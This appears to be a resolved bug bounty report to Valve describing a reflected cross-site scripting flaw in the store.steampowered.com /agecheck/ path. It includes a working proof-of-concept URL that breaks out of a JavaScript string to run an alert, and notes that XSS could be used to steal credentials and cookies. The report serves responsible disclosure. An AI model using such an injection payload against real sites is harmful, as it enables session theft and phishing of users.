XSS @ store.steampowered.com via agecheck path name
Medium
V
Valve
Submitted None
Actions:
Reported by
tvmpt
Vulnerability Details
Technical details and impact analysis
Hi,
I found a Cross-Site Scripting (XSS) in store.steampowered.com because the path after /agecheck/ is not sanitized as it should.
```
https://store.steampowered.com/agecheck/appmhuh2',{ sessionid: g_sessionID, ageDay: '', ageMonth: '', ageYear: '' } ).done( function( response ) { }%20 );}alert`XSS-by-TvM`;function x(){$J.post('mr2n2/247660/
```
Open this^ link, and XSS will be executed! Tested on FF 61.0.2
Looking forward!
Best regards,
Pedro
## Impact
A cross-site scripting vulnerability allows an attacker to modify the page. The attacker can inject forms to steal usernames, passwords, cookies,etc. In short, XSS opens the doors to plenty of phishing techniques.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$750.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected